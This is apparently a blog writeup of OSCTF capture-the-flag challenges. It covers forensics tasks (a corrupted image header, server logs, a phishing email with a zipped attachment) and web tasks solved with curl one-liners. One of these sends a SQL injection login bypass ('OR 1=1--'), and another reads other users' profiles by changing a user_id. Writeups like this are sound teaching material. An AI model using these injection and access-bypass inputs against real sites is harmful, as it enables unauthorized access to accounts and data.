Post

OSCTF - Writeup

Posted Updated
Preview Image
By crmulent 5 min read

A writeup for OSCTF.

Forensics

The Lost Image Mystery

Flag: OSCTF{W0ah_F1l3_h34D3r5}

In the bustling city of Cyberville, a crucial image file has been corrupted, and it’s up to you, a budding digital forensics expert, to recover it. The file appears to be damaged, can you recover the contents of the file?

1
2
3
4
5
6
7
8
9
10
11

$ xxd image.png | head
00000000: d8e0 0049 4600 0101 0000 0100 0100 00ff  ...IF...........
00000010: e201 d849 4343 5f50 524f 4649 4c45 0001  ...ICC_PROFILE..
00000020: 0100 0001 c800 0000 0004 3000 006d 6e74  ..........0..mnt
00000030: 7252 4742 2058 595a 2007 e000 0100 0100  rRGB XYZ .......
00000040: 0000 0000 0061 6373 7000 0000 0000 0000  .....acsp.......
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: 0000 0000 0100 00f6 d600 0100 0000 00d3  ................
00000070: 2d00 0000 0000 0000 0000 0000 0000 0000  -...............
00000080: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000090: 0000 0000 0000 0000 0000 0000 0000 0000  ................

The Hidden Soundwave

Flag: OSCTF{M3s54g3_1nt3Rc3p7eD}

We’ve intercepted some signals which is allegedly transmitted by aliens…? Do aliens listen to Alan Walker? I don’t know, it’s up to you to understand but we are sure there’s something hidden in this song and we need to decrypt it!

[insert photo]

Mysterious Website Incident

Flag: OSCTF{1_c4N_L0g!}

In the heart of Cyber City, a renowned e-commerce website has reported suspicious activity on its servers. As a rookie digital investigator, you’ve been called in to uncover the truth behind this incident. Your journey begins with examining the server’s records, searching for clues that could shed light on what transpired.

1
2
3
4
5

265 192.168.1.1 - - [14/Jun/2024:07:47:14 +0000] "DELETE /index.html HTTP/1.1" 404 1477 "http://test.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"
266 192.168.1.2 - - [14/Jun/2024:07:47:14 +0000] "POST /submit_form HTTP/1.0" 200 459 "http://localhost" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"
267 my_secret :D - - [14/Jun/2024:07:47:14 +0000] "GET https://drive.google.com/file/d/15IwD7QiSKtvmW7XG2gYkdnwW0bxXBgdj/view?usp=drive_link HTTP/1.0" 200 3625 "http://test.com" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
268 192.168.1.2 - - [14/Jun/2024:07:47:14 +0000] "POST /robots.txt HTTP/1.1" 200 2385 "http://test.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"
269 192.168.1.3 - - [14/Jun/2024:07:47:14 +0000] "GET /submit_form HTTP/1.1" 500 3247 "http://test.com" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

1

https://drive.google.com/file/d/15IwD7QiSKtvmW7XG2gYkdnwW0bxXBgdj/view?usp=drive_link

Cyber Heist Conspiracy

Flag: OSCTF{Pr0_W1Th_PC4Ps}

In the heart of Silicon City, rumors swirl about a sophisticated cyber heist orchestrated through covert network channels. As a novice cyber investigator, you’ve been tasked with analyzing a mysterious file recovered from the scene of the digital crime.

Seele Vellorei

Flag: OSCTF{V3l10n4_1s_Gr43t}

Seele Vollerei is an orphaned girl in Cocolia’s Orphanage. But the tragic event in her past made that she was gone forever, until then she returned like a mysterious butterfly. How is this related to the challenge though? You figure out for youself ;)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

$ unzip SeeleVollerei.docx
Archive:  SeeleVollerei.docx
  inflating: [Content_Types].xml
  inflating: _rels/.rels
  inflating: word/document.xml
  inflating: word/_rels/document.xml.rels
 extracting: word/media/image1.png
  inflating: word/theme/theme1.xml
  inflating: word/settings.xml
  inflating: word/styles.xml
  inflating: word/webSettings.xml
  inflating: word/fontTable.xml
  inflating: docProps/core.xml
  inflating: docProps/app.xml

$ grep -rioE "osctf{\w+}"
word/document.xml:OSCTF{V3l10n4_1s_Gr43t}

FOR101

Flag: OSCTF{JU5t_n0rmal_eXE1_f113_w1th_C2_1n51De}

An employee of MDSV company received a lottery winning letter. Because of greed, that employee opened that email and as a result, the company’s computer was attacked. Luckily, the SOC department was able to capture the disk image and blockade that employee’s computer. Your task is to conduct investigation, analysis and retrieve the flag.

Challenge file: https://drive.google.com/file/d/1PF9DFZoNhb61bs3k0kcuyFEe5U_kA7LR/view

Navigating through directories, I found an interesting eml file. The file is located at /Users/Administrator/Downloads/Outlook Files.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

$head -n 25 Notifications.eml
Content-Type: multipart/mixed; boundary="===============1582594319=="
MIME-Version: 1.0
From: mmb1234@example.com
To: maikanizumi@example.com
Subject: Credit Card For Free

--===============1582594319==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

You have won $10,000. I have sent you a credit card containing your bonus. Because this is a gift of great value, it will be kept confidential. Password is CreditsCardForFree
--===============1582594319==
Content-Type: application/octet-stream
MIME-Version: 1.0
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="CreditsCard.zip"

UEsDBBQACQBjAHqQ6Fgjz4wWgd0FAATrBQAOAAsAQ3JlZGl0czY5Lnhsc20BmQcAAQBBRQMIALCJ
haRRXhXXhdwy9Ql6IXQgIO4ovBCASOLtQUM0nDO2NjbgjTdHMrqMwlFb88f474QaR6UAZ8wLmO85
Mvn4RQUoXFP3ry4BGkRi1V8Tmf7baZeBJKYHC7EmLhqkWtzsduispUUr+9bSgLngwvZi3GTJVFrb
<...>

We can see a message with the password and a long base64 code. Putting the code in CyberChef, it detected that the code is a PKZIP file. So I decoded the code and downloaded the file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

$ 7z x for101.zip -p 'CreditsCardForFree'

7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20
 64-bit locale=en_US.UTF-8 Threads:32 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 384585 bytes (376 KiB)

Extracting archive: for101.zip
--
Path = for101.zip
Type = zip
Physical Size = 384585


No files to process
Everything is Ok

Files: 0
Size:       0
Compressed: **384585**

Web

Introspection

Flag: OSCTF{Cr4zY_In5P3c71On}

Welcome to the Secret Agents Portal. Find the flag hidden in the secrets of the Universe!!!

1
2

$ curl -s http://34.16.207.52:5134/script.js | grep -oiE osctf{.+}
OSCTF{Cr4zY_In5P3c71On}

Style Query Listing…?

Flag: OSCTF{D1r3ct0RY_BrU7t1nG_4nD_SQL} pfft.. Listen, I’ve gained access to this login portal but I’m not able to log in. The admins are surely hiding something from the public, but… I don’t understand what. Here take the link and be quiet, don’t share it with anyone

1
2

$ curl -sL http://34.16.207.52:3635/login -d "username=admin&password=%27+OR+1%3D1--" | grep -oiE osctf{.+}
OSCTF{D1r3ct0RY_BrU7t1nG_4nD_SQL}

Indoor WebApp

Flag: OSCTF{1nd00r_M4dE_n0_5enS3}

The production of this application has been completely indoor so that no corona virus spreads, but that’s an old talk right?

1
2

$ curl -s http://34.16.207.52:2546/profile?user_id=2 | grep -oiE osctf{.+}
OSCTF{1nd00r_M4dE_n0_5enS3}
forensics, web
This post is licensed under CC BY 4.0 by the author.

Trending Tags

linux tshark